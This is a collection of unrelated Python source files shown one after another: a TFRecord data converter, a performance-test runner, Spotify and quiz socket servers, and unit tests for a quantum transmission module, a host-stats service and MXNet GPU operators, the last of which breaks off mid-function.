keys_to_features = {'colors': tf.FixedLenFeature([], tf.string),
'normals': tf.FixedLenSequenceFeature([], dtype=tf.float32, allow_missing=True)}
parsed_features = tf.parse_single_example(example_proto, keys_to_features)
color = tf.cast(tf.reshape(tf.decode_raw(parsed_features['colors'], tf.uint8), (512, 512, 3)), tf.float32)
normal = tf.reshape(parsed_features['normals'], (512, 512, 3))
return (color, normal)
list_of_open_elements = []
list_of_done_elements = []
lock_open = threading.Lock()
lock_done = threading.Lock()
lock_writer = threading.Lock()
lock_writer_nr = threading.Lock()
sem_open = threading.Semaphore(0)
sem_done = threading.Semaphore(0)
done = False
done_counter = 0
global_write_counter = 0
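# Pipeline overview (descriptive note): the main loop at the bottom of this script feeds .hdf5 paths
# into list_of_open_elements; normalizing_fct workers load each file, validate its normal image and
# append (color, normal) pairs to list_of_done_elements; write_fct workers serialize those pairs into
# GZIP-compressed train_<n>.tfrecord shards, rolling over to a new shard every 500 written examples.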
def normalizing_fct():
global list_of_open_elements, sem_open, done_counter
counter_here = 0
while not done:
shouldSleep = True
while shouldSleep and not done:
try:
lock_done.acquire()
size = len(list_of_done_elements)
lock_done.release()
finally:
pass
shouldSleep = size > 100
if shouldSleep:
time.sleep(0.25)
if done:
break
sem_open.acquire()
if done:
break
try:
lock_open.acquire()
path = list_of_open_elements.pop()
lock_open.release()
finally:
pass
time.sleep(0.05)
try:
with h5py.File(path, 'r') as data:
if "colors" in data.keys() and "normals" in data.keys():
raw_image = np.array(data["colors"])
raw_image = raw_image[:, :, :3]
color_o = (raw_image / 255.0)
normal_o = np.array(data["normals"])
# converting normal images
if np.any(np.isinf(normal_o)) or np.min(normal_o) < 0:
print("This .hdf5 container contains an invalid normal img: {}".format(path))
continue
counter_here += 1
else:
continue
except IOError:
continue
lock_done.acquire()
list_of_done_elements.append([color_o, normal_o])
done_counter += 1
lock_done.release()
color_o = None
normal_o = None
sem_done.release()
writer_nr = 0
def write_fct():
global sem_done, global_write_counter, writer_nr
start_new_writer = True
writer = None
write_counter = 0
options = tf.python_io.TFRecordOptions(tf.python_io.TFRecordCompressionType.GZIP)
while not done:
if start_new_writer:
lock_writer_nr.acquire()
if writer is not None:
writer.close()
writer = None
writer = tf.python_io.TFRecordWriter(
os.path.join(write_folder_path, "train_{}.tfrecord".format(writer_nr)), options=options)
print("Start new tf record file")
writer_nr += 1
start_new_writer = False
lock_writer_nr.release()
sem_done.acquire()
try:
lock_done.acquire()
if len(list_of_done_elements) > 0:
c, n = list_of_done_elements.pop()
else:
lock_done.release()
continue
lock_done.release()
finally:
pass
serialized = serialize_tfrecord(c, n)
lock_writer.acquire()
writer.write(serialized)
global_write_counter += 1
lock_writer.release()
serialized = None
c = None
n = None
write_counter += 1
if write_counter % 500 == 0:
start_new_writer = True
print("Done writing fct: " + str(write_counter))
writer.close()
paths = glob.glob(os.path.join(folder_path.replace("@", "*"), "*.hdf5"))
paths.sort()
paths.reverse()
threads = []
normalizer_workers = 1
writer_workers = 1
for i in range(writer_workers):
t = threading.Thread(target=write_fct)
t.daemon = True
threads.append(t)
t.start()
for i in range(normalizer_workers):
# Create each normalizer thread; it pulls paths from list_of_open_elements
# and appends decoded (color, normal) pairs to list_of_done_elements.
t = threading.Thread(target=normalizing_fct)
t.daemon = True
threads.append(t)
t.start()
counter = len(paths)
for path in paths:
length_ok = True
while length_ok:
lock_done.acquire()
length_now = len(list_of_done_elements)
lock_done.release()
length_ok = False
if length_now > 15:
time.sleep(0.1)
length_ok = True
lock_open.acquire()
list_of_open_elements.append(path)
lock_open.release()
sem_open.release()
while not done:
lock_done.acquire()
length_now = len(list_of_done_elements)
lock_done.release()
lock_open.acquire()
length_2 = len(list_of_open_elements)
lock_open.release()
sys.stdout.flush()
time.sleep(0.25)
if length_now + length_2 == 0:
done = True
break
print(' ')
for i in range(writer_workers):
sem_done.release()
for i in range(writer_workers):
threads[i].join()
print("Writer closed")
sem_open.release()
for t in threads:
t.join()
exit()
|
Perf_runner.py
|
#!/usr/bin/env python3
import os
import argparse
import time
import sys
from threading import Thread, Lock
global txns
global clients
clients = 100
txns = 100
# ==================== Notes and information ====================
# This script runs multiple threaded instances of the Perf_Add_nyms.py or the Perf_get_nyms.py script. The
# command line parameters for each script are different and can be set from this script without modifying the
# Add_nyms or Get_nyms scripts themselves.
# The settings for the Perf runner are 'clients' and 'txns'. 'clients' is the number of threads (or client machines)
# to use, and 'txns' is how many transactions each client (thread) will run. These settings are specific to
# Perf_runner.py.
#
# The command line for both performance scripts is built in the 'command' variable found below. The default setting
# for Perf_Add_nyms.py uses the -n parameter for the number of transactions ('txns') and the -s parameter for the
# client index; the loop over 'clients' uses 'i' to track which iteration is being processed.
# The default variables of the Add_nyms script are used otherwise. If any of the default settings for Add_nyms or
# Get_nyms need to be modified, make the change here in the perf runner by editing the 'command' variable.
# ================================================================
# Examples:
# Run Perf_Add_nyms.py: python3.6 Perf_runner.py -a
# Run Perf_get_nyms.py using 3 clients (threads) - by setting clients to 3: python3.6 Perf_runner.py -g
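# For reference, the inner command each thread builds (hypothetical values with clients = 3, txns = 100):
#   thread i with -a: python3 Perf_Add_nyms.py -n 100 -s <i>
#   any thread with -g: python3 Perf_get_nyms.py -s 3 -d nym_files
# Each command is executed via os.system inside run_test below.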
parser = argparse.ArgumentParser(description='This script will create multiple threads of the Perf_Add_nyms.py or '
'the Perf_get_nyms.py.')
parser.add_argument('-a', help='Use this parameter to start Perf_Add_nyms.py', action='store_true',
default=False, required=False)
parser.add_argument('-g', help='Use this parameter to start Perf_get_nyms.py', action='store_true',
default=False, required=False)
# parser.print_help()
results = parser.parse_args()
if results.a:
results.a = 'Perf_Add_nyms.py'
if results.g:
results.g = 'Perf_get_nyms.py'
def run_test(i, lock):
print("This is a test : " + repr(results.g))
print("This is a test : " + repr(results.a))
if results.a:
# The value for -n is the 'txns' variable at the top of this script
command = 'python3 ' + results.a + ' -n ' + str(txns) + ' -s ' + repr(i)
elif results.g:
# The default values for -d -t and -g in get_nym will be used
command = 'python3 ' + results.g + ' -s ' + repr(clients) + ' -d nym_files'
else:
print("\n\nPlease specify a script to use or run Perf_runner.py -h for additional information")
sys.exit(1)
with lock:
print("Starting thread {}".format(i))
# Run the command
# print(command)
os.system(command)
with lock:
print("Thread {} stopped".format(i))
# Create threads
lock = Lock()
# Start Time
# timeBegin = datetime.now()
overmind_start_time = time.time()
# get the number of clients (threads) to create
threads = [Thread(target=run_test, args=(i, lock)) for i in range(clients)]
# Start threads
for x in threads:
x.start()
# Stop threads
for x in threads:
x.join()
# Total Time
totalTime = time.time() - overmind_start_time
hours, remainder = divmod(totalTime, 3600)
minutes, seconds = divmod(remainder, 60)
ttl_txns = clients * txns
ttl_seconds = int((hours * 3600) + (minutes * 60) + seconds)
try:
txns_per_second = int(ttl_txns / ttl_seconds)
except Exception as E:
txns_per_second = None
print("There is too small test run time that causes an error: ", E)
print("\n ----------- Total time to run the test: %dh:%dm:%ds" % (hours, minutes, seconds) + " -----------")
print("\n Clients = " + str(clients))
print("\n Transaction per client = " + str(txns))
print("\n Total transactions requested = " + str(ttl_txns))
print("\n Estimated transactions per second = " + str(txns_per_second))
tm = time.strftime("%d-%m-%Y_%H-%M-%S")
file = open("test_results_time_" + tm + ".log", "w")
file.write("\n ----------- Total time to run the test: %dh:%dm:%ds" % (hours, minutes, seconds) + " -----------\n")
file.write("\n Clients = " + str(clients))
file.write("\n Transaction per client = " + str(txns))
file.write("\n Total transactions requested = " + str(ttl_txns))
file.write("\n Estimated transactions per second = " + str(txns_per_second))
file.close()
|
server.py
|
from gettext import find
import socket
import threading
import spotipy
from spotipy.oauth2 import SpotifyOAuth
HEADER = 64
PORT = 5050
SERVER = socket.gethostbyname(socket.gethostname())
ADDR = (SERVER, PORT)
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = "!DISCONNECT"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(ADDR)
def init_auth_manager():
with open('token-data_server.txt', 'r') as file:
cred_data = file.readlines()
scope = 'user-library-read user-read-playback-state user-modify-playback-state user-read-currently-playing'
auth_manager = SpotifyOAuth(
client_id=cred_data[0].strip(),
client_secret=cred_data[1].strip(),
redirect_uri=cred_data[2].strip(),
scope=scope)
return auth_manager
"""
Asks user for which playback device they'd like and returns the device id.
"""
def select_device(avail_devices):
device_names = list(avail_devices.keys())
if len(device_names) == 0:
return
user_input = -1
while user_input-1 not in range(len(device_names)):
try:
print()
for i in range(len(device_names)):
print(f"({i+1}) {device_names[i]}")
print()
print("Enter the number that corresponds with your player.")
user_input = int(input("> "))
except ValueError:
print("[ERROR] Please enter a valid number.")
return avail_devices[device_names[user_input-1]]
"""
Calls API to grab the available devices user can interact with.
"""
def get_avail_devices(sp):
avail_devices = dict()
results = sp.devices()
# print(len(results['devices']))
if len(results['devices']) != 0:
for i in range(len(results['devices'])):
avail_devices[results['devices'][i]['name']] = results['devices'][i]['id']
else:
print("[ERROR] There are no available devices.")
return avail_devices
"""
Plays a provided track on a provided device.
"""
def play_track(sp, device_id, track_id):
uris_list = []
uris_list.append(track_id)
sp.start_playback(device_id=device_id, uris=uris_list)
def handle_client(conn, addr, sp, device_id):
print(f"[NEW CONNECTION] {addr} connected.")
# conn.send("[CONNECTED] You connected to the host".encode(FORMAT))
connected = True
while connected:
msg_length = conn.recv(HEADER).decode(FORMAT)
if msg_length:
msg_length = int(msg_length)
msg = conn.recv(msg_length).decode(FORMAT)
if msg == DISCONNECT_MESSAGE:
connected = False
print(f"[{addr}] {msg}")
match msg:
case "playing":
track_info = sp.currently_playing()
track_name = track_info['item']['name']
track_artist = track_info['item']['album']['artists'][0]['name']
track_album = track_info['item']['album']['name']
conn.send(f"Name: {track_name} | Artist: {track_artist} | Album: {track_album}".encode(FORMAT))
if ("https://open.spotify.com/track/") in msg:
play_track(sp, device_id, msg)
track_info = sp.currently_playing()
track_name = track_info['item']['name']
track_artist = track_info['item']['album']['artists'][0]['name']
conn.send(f"[ADDED] ({track_name} by {track_artist}) added to queue.".encode(FORMAT))
conn.close()
def start():
server.listen()
print(f"[LISTENING] Server is listening on {SERVER}")
# Placed API build inside of the start function for organization
auth_manager = init_auth_manager()
sp = spotipy.Spotify(auth_manager=auth_manager)
# Host must select device player when initializing server.
avail_devices = get_avail_devices(sp)
device_id = select_device(avail_devices)
while True:
if device_id is None:
break
conn, addr = server.accept()
thread = threading.Thread(target=handle_client, args=(conn, addr, sp, device_id))
thread.start()
print(f"[ACTIVE CONNECTIONS] {threading.active_count() - 1}")
print("[CLOSING] server is stopping...")
print("[STARTING] server is starting...")
start()
|
tt_server.py
|
from socket import *
import datetime
import time
import threading
class ThreadedServer():
def listenToClient(self, client, addr):
userName = (client.recv(1024)).decode("utf-8")
print(userName, "logged in")
while True:
counter = 0
answers = []
questions = []
choice = (client.recv(1024)).decode("utf-8")
if choice == "0":
print(userName, "left the server")
client.close()
return
else:
if choice == "1":
testName = "Networks test"
elif choice == "2":
testName = "Russian test"
elif choice == "3":
testName = "Math test"
print(userName, "started", testName)
if choice == "1":
questions = self.questions1
elif choice == "2":
questions = self.questions2
else:
questions = self.questions3
for i in range(6):
client.send(questions[counter].encode())
message = client.recv(1024)
if message == "exit":
print(addr, " is closed")
client.close()
else:
answers.append(message.decode("utf-8").upper())
ts = time.time()
st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
print(userName, "give answer", answers[counter], "for question", counter + 1,
"timestamp:",
st)
counter += 1
self.assessment(addr, answers, userName, int(choice), client, testName)
def assessment(self, addr, answers, userName, choice, client, testName):
point = 0
print(userName, "answers for", testName, answers)
if choice == 1:
if (answers[0] == "A"):
point += 1
if (answers[1] == "A"):
point += 1
if (answers[2] == "A"):
point += 1
if (answers[3] == "C"):
point += 1
if (answers[4] == "D"):
point += 1
if (answers[5] == "A"):
point += 1
elif choice == 2:
if (answers[0] == "A"):
point += 1
if (answers[1] == "A"):
point += 1
if (answers[2] == "A"):
point += 1
if (answers[3] == "A"):
point += 1
if (answers[4] == "A"):
point += 1
if (answers[5] == "A"):
point += 1
elif choice == 3:
if (answers[0] == "B"):
point += 1
if (answers[1] == "B"):
point += 1
if (answers[2] == "B"):
point += 1
if (answers[3] == "B"):
point += 1
if (answers[4] == "B"):
point += 1
if (answers[5] == "B"):
point += 1
if (point < 2):
success_comment = "Mark is 2"
elif (point < 4):
success_comment = "Mark is 3"
elif (point <= 5):
success_comment = "Mark is 4"
else:
success_comment = "Mark is 5"
client.send(("Your result of " + testName + " " + str(point) + "/6 | " + success_comment).encode())
result = "Socket Information: " + str(addr[0]) + ":" + str(addr[1]) + " | Username: " + userName \
+ " | Result:" + str(point) + "/6 | " + success_comment
print(result)
return result
def __init__(self, serverPort):
with open('questions.txt') as inp:
self.sets = inp.read().split("FINISH")
self.questions1 = self.sets[0].split("''',")
self.questions2 = self.sets[1].split("''',")
self.questions3 = self.sets[2].split("''',")
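# Expected questions.txt layout (inferred from the splits above): three question sets separated by the
# literal marker FINISH, with the individual questions inside each set separated by the sequence ''',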
self.answers = []
try:
self.serverSocket = socket(AF_INET, SOCK_STREAM)
except:
print("Socket cannot be created!!!")
exit(1)
print("Socket is created...")
try:
self.serverSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
except:
print("Socket cannot be used!!!")
exit(1)
print("Socket is being used...")
try:
self.serverSocket.bind(('', serverPort))
except:
print("Binding cannot de done!!!")
exit(1)
print("Binding is done...")
try:
self.serverSocket.listen(1)
except:
print("Server cannot listen!!!")
exit(1)
print("The server is ready to receive")
while True:
connectionSocket, addr = self.serverSocket.accept()
threading.Thread(target=self.listenToClient, args=(connectionSocket, addr)).start()
if __name__ == "__main__":
serverPort = 5006
ThreadedServer(serverPort)
|
test_transmission.py
|
from HaPPPy.Transmission.TransmissionCalculator import TransmissionCalculator
from threading import Thread
from scipy.constants import codata
import threading
import unittest
import pytest
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
_x = []
_psi_plot = []
_V = []
class TransmissionTestSuite(unittest.TestCase):
"""
Set of validation tests that ensure the module does not accept
invalid or corrupt inputs.
"""
def test_validation_does_not_allow_negative_electron_energies(self):
# Assemble
E = -1
dx = 0.1
barrier = np.array(20+np.zeros(3000))
transmission_calculator = TransmissionCalculator()
# Act
with pytest.raises(ValueError) as exception_results:
transmission_calculator.calculate_transmission(E, barrier, dx)
# Assert
self.assertTrue("Electron energy must be greater than 0." in str(exception_results.value))
def test_validation_does_not_allow_electron_energies_bigger_than_potential(self):
# Assemble
E = 25
dx = 0.1
barrier = np.array(20+np.zeros(3000))
transmission_calculator = TransmissionCalculator()
# Act
with pytest.raises(ValueError) as exception_results:
transmission_calculator.calculate_transmission(E, barrier, dx)
# Assert
self.assertTrue("Electron energy cannot be bigger than max potential value." in str(exception_results.value))
def test_validation_does_not_allow_invalid_potential(self):
# Assemble
E = 25
dx = 0.1
barrier = [np.array(20+np.zeros(3000)), np.array(20+np.zeros(3000))]
transmission_calculator = TransmissionCalculator()
# Act
with pytest.raises(ValueError) as exception_results1:
transmission_calculator.calculate_transmission(E, barrier, dx)
with pytest.raises(ValueError) as exception_results2:
transmission_calculator.calculate_transmission(E, "some string", dx)
# Assert
self.assertTrue("The potential must be an array of one dimension" in str(exception_results1.value))
self.assertTrue("The potential must be an array of one dimension" in str(exception_results2.value))
def test_validation_does_not_allow_invalid_dx(self):
# Assemble
E = 10
barrier = np.array(20+np.zeros(3000))
transmission_calculator = TransmissionCalculator()
# Act
with pytest.raises(ValueError) as exception_results1:
transmission_calculator.calculate_transmission(E, barrier, 0)
with pytest.raises(ValueError) as exception_results2:
transmission_calculator.calculate_transmission(E, barrier, -1)
# Assert
self.assertTrue("dx must be greater than 0" in str(exception_results1.value))
self.assertTrue("dx must be greater than 0" in str(exception_results2.value))
def test_validation_does_not_allow_too_large_energies(self):
# Assemble
E = 10000
V0 = 60000
dx = 0.1
barrier = np.array(V0+np.zeros(100))
transmission_calculator = TransmissionCalculator()
# Act
with pytest.raises(ValueError) as exception_results:
transmission_calculator.calculate_transmission(E, barrier, dx)
# Assert
self.assertTrue("The energy provided results in too much intertia. The algorithm cannot provide results for such energies." in str(exception_results.value))
def test_validation_does_not_allow_invalid_dx(self):
# Assemble
E = 10
barrier = np.array(20+np.zeros(3000))
transmission_calculator = TransmissionCalculator()
# Act
with pytest.raises(ValueError) as exception_results1:
transmission_calculator.calculate_transmission(E, barrier, 0)
with pytest.raises(ValueError) as exception_results2:
transmission_calculator.calculate_transmission(E, barrier, -1)
# Assert
self.assertTrue("dx must be greater than 0" in str(exception_results1.value))
self.assertTrue("dx must be greater than 0" in str(exception_results2.value))
"""
Checks the spread of a free particle (Gaussian wave packet) in space.
Correctness is checked by comparing the width at half height over
time with its theoretical prediction.
"""
def test_width_of_free_gaussian_package_grows_correctly(self):
# Assemble
hbar = 1
me = 1
E = 0.5
dx = 0.1
barrier = np.zeros(300)
initial_package_width = 1
error_tolerance = 1
package_widths = []
package_expected_widths = []
# ref: https://stackoverflow.com/a/16489955
def find_width_at_half_max_height(X,Y):
half_max = max(Y) / 2
# find when function crosses line half_max (when sign of diff flips)
d = np.sign(half_max - np.array(Y[0:-1])) - np.sign(half_max - np.array(Y[1:]))
# find the left and right most indexes
left_idx = np.argwhere(d > 0)[0]
right_idx = np.argwhere(d < 0)[-1]
return (X[right_idx] - X[left_idx])[0] / (2 * np.sqrt(2 * np.log(2))) # full width at half maximum converted to the Gaussian sigma
def _step_callback(self, psi, psi_plot, x, n, finished):
t = self.dt * n
package_widths.append(find_width_at_half_max_height(x, psi_plot))
width = initial_package_width/2 * np.sqrt(1 + (4*(hbar**2)*(t**2))/((me**2)*(initial_package_width**4)))
package_expected_widths.append(width)
# As there is no barrier we want to intercept the exit condition and
# return after 1000 split steps
def _step_exit(self, n):
if (n == 1000):
return True
return False
transmission_calculator = TransmissionCalculator(
disable_electron_potential_validation = True,
_hbar = hbar,
_me = me,
package_wdh = initial_package_width,
step_callback = _step_callback,
step_exit = _step_exit
)
# Act
transmission_calculator.calculate_transmission(E, barrier, dx)
error = max(np.absolute(np.array(package_widths) - np.array(package_expected_widths)))
# Assert
self.assertTrue(error < error_tolerance)
"""
Makes sure the integral over the probability density is 1.
"""
def test_propability_density_is_1(self):
# Assemble
E = 500 * codata.value("electron volt") * 1e-3
V0 = 600 * codata.value("electron volt") * 1e-3
dx = 0.1
barrier = np.array(V0 + np.zeros(250))
prob_dens = []
error_tolerance = 0.1
def _step_callback(self, psi, psi_squared, x, n, finished):
if (finished == True):
prob = np.multiply(psi, psi.conj()).real
prob_dens.append(dx*np.sum(psi_squared))
transmission_calculator = TransmissionCalculator(
step_callback = _step_callback
)
# Act
transmission_calculator.calculate_transmission(E, barrier, dx)
error = max(np.absolute(np.array(prob_dens) - 1))
# Assert
self.assertTrue(error < error_tolerance)
"""
Plots |T|^2 over E/V and should show a characteristic curve.
The test is not checked automatically for correctness; the tester
must review the plot manually.
"""
def test_transmission_to_energy_ratio(self):
# Assemble
E = 100 * codata.value("electron volt") * 1e-3
V_0 = 400 * codata.value("electron volt") * 1e-3
# E = 10 * codata.value("electron volt") * 1e-3
# V_0 = 40 * codata.value("electron volt") * 1e-3
dx = 0.1
barrier = np.array(V_0 + np.zeros(300))
V_over_E = []
transmissions = []
def _step_callback(self, psi, psi_plot, x, n, finished):
if (finished == True):
plt.xlabel('x in pm')
plt.ylabel(r'$|\Psi(x)|^2$')
plt.plot(
self.x,
psi_plot,
self.x,
max(psi_plot)*(self.V)/max(self.V))
plt.show()
transmission_calculator = TransmissionCalculator(disable_electron_potential_validation = True,
# step_callback = _step_callback
)
for E in np.arange(0, 4 * V_0, V_0 / 5):
# Act
if (E == 0):
E = 1 * codata.value("electron volt") * 1e-3
transmission = transmission_calculator.calculate_transmission(E, barrier, dx)
transmissions.append(transmission**2)
V_over_E.append(E / V_0)
# print(transmissions)
plt.xlabel('E/V')
plt.ylabel('T^2')
plt.plot(V_over_E, transmissions)
plt.show()
self.assertTrue(True)
"""
Tests the entire transmission calculation process and - if configured -
displays the plot of the final propagation state.
Compares the result with a reference result found here:
https://www.youtube.com/watch?v=_3wFXHwRP4s
"""
def test_transmission_returns_realistic_values(self):
# Assemble
E = 500 * codata.value("electron volt") * 1e-3
V0 = 600 * codata.value("electron volt") * 1e-3
dx = 0.05
barrier = np.array(V0 + np.zeros(250))
# E = 10 * codata.value("electron volt") * 1e-3
# V0 = 40 * codata.value("electron volt") * 1e-3
# dx = 0.1
# barrier = np.array(V0 + np.zeros(3000))
prob_dens = []
error_tolerance = 0.1
def _step_callback(self, psi, psi_plot, x, n, finished):
if (finished == True):
plt.xlabel('x in pm')
plt.ylabel(r'$|\Psi(x)|^2$')
plt.plot(
self.x,
psi_plot,
self.x,
max(psi_plot)*(self.V)/max(self.V)
)
plt.show()
transmission_calculator = TransmissionCalculator(
# step_callback = _step_callback,
)
# Act
transmission = transmission_calculator.calculate_transmission(E, barrier, dx)
# Assert
self.assertTrue(np.abs(1 - transmission / 0.175) < error_tolerance)
"""
Animates the entire propagation of the Gaussian wave packet through a potential.
For visual purposes only; it does not validate against anything and thus
simply asserts True.
"""
def xtest_animate_progress(self):
# Assemble
E = 550 * codata.value("electron volt") * 1e-3
V0 = 600 * codata.value("electron volt") * 1e-3
dx = 0.05
barrier = np.array(V0 + np.zeros(200))
prob_dens = []
error_tolerance = 0.1
fig, ax = plt.subplots()
line = ax.plot([], [])
plt.xlabel('x')
plt.ylabel(r'$|\Psi|^2$')
def update(data):
plt.gca().cla()
plt.plot(_x, 0.6 * (_V / max(_V)))
ax.plot(_x, _psi_plot),
ax.set_xlim(-100, 100)
ax.set_ylim(0, 0.8)
def data_gen():
global _psi_plot
yield _psi_plot
def _step_callback(self, psi, psi_plot, x, n, finished):
global _psi_plot
global _x
global _V
_psi_plot = psi_plot
_x = self.x
_V = self.V
transmission_calculator = TransmissionCalculator(
step_callback = _step_callback,
)
ani = animation.FuncAnimation(fig, update, data_gen, interval=30)
# Act
Thread(target = transmission_calculator.calculate_transmission, args = (E, barrier, dx)).start()
plt.show()
self.assertTrue(True)
if __name__ == '__main__':
transmission_suite = unittest.TestLoader().loadTestsFromTestCase(TransmissionTestSuite)
unittest.TextTestRunner(verbosity=2, buffer=True).run(transmission_suite)
|
test_server.py
|
import json
import logging
import time
from multiprocessing import Process, Queue
from time import sleep
from unittest import TestCase, mock
from unittest.mock import call
from hoststats.app import app
from hoststats.collection import SLEEP_INTERVAL_MS, collect_metrics
from hoststats.stats import FORWARD_HEADER
SLEEP_INTERVAL_SECS = SLEEP_INTERVAL_MS / 1000
class MockResponse:
def __init__(self, text, status_code):
self.text = text
self.content = text
self.data = bytes(text, "utf-8")
self.status_code = status_code
self.headers = {
"content-encoding": "blah",
"content-length": 123,
"some-other-header": "hi there",
}
def mocked_requests_request(method, url, headers):
logging.debug(f"Calling mocked request: {method}, {url}, {headers}")
if url.endswith("ping"):
return MockResponse("mocked ping", 200)
elif url.endswith("start"):
return MockResponse("mocked start", 200)
elif url.endswith("stop"):
return MockResponse("mocked stop", 200)
else:
raise RuntimeError("Unrecognised mock request")
class TestHostStatsCollection(TestCase):
def setUp(self):
app.config["TESTING"] = True
self.client = app.test_client()
def test_ping(self):
res = self.client.get("ping")
self.assertEqual(res.status_code, 200)
self.assertEqual(res.data.decode("utf-8"), "PONG")
def test_api(self):
# Start the collection
start_time_millis = int(time.time() * 1000)
self.client.get("start")
# Sleep for a couple of intervals
n_intervals = 2
sleep(n_intervals * SLEEP_INTERVAL_SECS + 1)
# Stop the collection
res = self.client.get("stop")
end_time_millis = int(time.time() * 1000)
actual = json.loads(res.data.decode("utf-8"))
self.check_collection_response(
n_intervals, start_time_millis, end_time_millis, actual
)
def test_collection(self):
# Start metrics collection in background
kill_queue = Queue()
result_queue = Queue()
start_time_millis = int(time.time() * 1000)
bg_proc = Process(
target=collect_metrics, args=(kill_queue, result_queue)
)
bg_proc.start()
# Allow a number of intervals to have happened
n_intervals = 2
sleep(n_intervals * SLEEP_INTERVAL_SECS + 1)
# Kill the background collection process
kill_queue.put("die")
bg_proc.join()
end_time_millis = int(time.time() * 1000)
# Get and parse result
actual = result_queue.get()
actual = json.loads(actual)
self.check_collection_response(
n_intervals, start_time_millis, end_time_millis, actual
)
def check_collection_response(
self, n_intervals, start_time_millis, end_time_millis, actual
):
# Check it has the entries we expect
self.assertListEqual(
list(actual.keys()), ["cpu", "mem", "disk", "net"]
)
# Check contents
cpu = actual["cpu"]
mem = actual["mem"]
disk = actual["disk"]
net = actual["net"]
# Pick a known stat, check we have expected number of readings
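# The +1 below assumes collect_metrics records one sample immediately and then one per elapsed
# interval; this is an assumption about the collection loop, not something verified here.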
expected_intervals = n_intervals + 1
write_mb_values = disk["DISK_WRITE_MB"]
self.assertEqual(len(write_mb_values), expected_intervals)
# Sense-check timestamps
cpu_timestamps = cpu["timestamp"]
self.assertEqual(len(cpu_timestamps), expected_intervals)
last_ts = 0
for ts in cpu_timestamps:
self.assertGreater(ts, last_ts)
self.assertGreater(ts, start_time_millis)
self.assertLess(ts, end_time_millis)
last_ts = ts
self.assertListEqual(mem["timestamp"], cpu_timestamps)
self.assertListEqual(disk["timestamp"], cpu_timestamps)
self.assertListEqual(net["timestamp"], cpu_timestamps)
# Sense-check some percentages
for cpu_pct in cpu["CPU_PCT"]:
self.assertGreaterEqual(cpu_pct, 0)
self.assertLessEqual(cpu_pct, 100)
for cpu_pct in cpu["CPU_0_PCT_IOWAIT"]:
self.assertGreaterEqual(cpu_pct, 0)
self.assertLessEqual(cpu_pct, 100)
for mem_pct in mem["MEMORY_USED_PCT"]:
self.assertGreaterEqual(mem_pct, 0)
self.assertLessEqual(mem_pct, 100)
def _check_mocked_request(self, mock_req, url, expected_response):
# Without setting our own user agent we get something chosen by the
# underlying Flask mock client which we would have to hard code.
user_agent = "foobar-agent"
resp = self.client.get(
url,
headers={
FORWARD_HEADER: "3.3.3.3",
},
environ_base={"HTTP_USER_AGENT": user_agent},
)
self.assertEqual(resp.data.decode("utf-8"), expected_response)
expected_calls = [
call(
method="GET",
url=f"http://3.3.3.3:5000/{url}",
headers={"User-Agent": user_agent},
),
]
self.assertListEqual(mock_req.call_args_list, expected_calls)
# Check headers filtered on response
expected_headers = {
"Content-Length": f"{len(expected_response)}",
"Content-Type": "text/html; charset=utf-8",
"some-other-header": "hi there",
}
actual_headers = {k: v for (k, v) in resp.headers}
self.assertEqual(actual_headers, expected_headers)
@mock.patch(
"hoststats.server.requests.request",
side_effect=mocked_requests_request,
)
def test_mocked_ping_request(self, mock_req):
self._check_mocked_request(mock_req, "ping", "mocked ping")
@mock.patch(
"hoststats.server.requests.request",
side_effect=mocked_requests_request,
)
def test_mocked_start_request(self, mock_req):
self._check_mocked_request(mock_req, "start", "mocked start")
@mock.patch(
"hoststats.server.requests.request",
side_effect=mocked_requests_request,
)
def test_mocked_stop_request(self, mock_req):
self._check_mocked_request(mock_req, "stop", "mocked stop")
|
test_operator_gpu.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import sys
import os
import time
import multiprocessing as mp
import mxnet as mx
import numpy as np
import pytest
from mxnet.test_utils import check_consistency, set_default_context, assert_almost_equal, assert_allclose
from mxnet.base import MXNetError
from mxnet import autograd
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '../unittest'))
from common import setup_module, with_seed, teardown_module, assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied
from common import run_in_spawned_process
from test_operator import *
from test_numpy_ndarray import *
from test_numpy_op import *
from test_numpy_interoperability import *
from test_optimizer import *
from test_random import *
from test_exc_handling import *
from test_sparse_ndarray import *
from test_sparse_operator import *
from test_ndarray import *
from test_subgraph_op import *
from test_gluon_gpu import _test_bulking
from test_contrib_operator import test_multibox_target_op
from test_contrib_optimizer import test_adamw
set_default_context(mx.gpu(0))
del test_support_vector_machine_l1_svm # noqa
del test_support_vector_machine_l2_svm # noqa
del test_custom_op_fork #noqa
def check_countsketch(in_dim,out_dim,n):
data = mx.sym.Variable("data")
h = mx.sym.Variable("h")
s = mx.sym.Variable("s")
sym = mx.sym.contrib.count_sketch(data=data, h=h, s=s, name='countsketch',out_dim = out_dim)
shape = [(n,in_dim), (1,in_dim),(1,in_dim)] #shape of input x, hash h and hash s
arr = [mx.nd.empty(shape[i]) for i in range(3)]
arr_grad = [mx.nd.empty(shape[i]) for i in range(3)]
x = np.random.uniform(-10, 10, shape[0])
arr[0][:] = x #input x
h = np.random.randint(0, out_dim, shape[1])
arr[1][:] = h #hash h
s = np.random.randint(0, 2, shape[2])*2-np.ones(shape[2])
arr[2][:] = s #hash s
locations = {"data": x, "h": h, "s": s}
a = np.zeros((n,out_dim))
temp = np.multiply(x, s)
for num_sample in np.arange(0,n):
for idx in np.arange(0,in_dim):
a[num_sample][h[0][idx]] += temp[num_sample][idx]
check_symbolic_forward(sym, locations, [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
out_grad = mx.nd.empty((n,out_dim))
out_grad[:] = np.random.normal(-3, 3, (n,out_dim))
a = np.zeros((n,in_dim))
for j in np.arange(0,n):
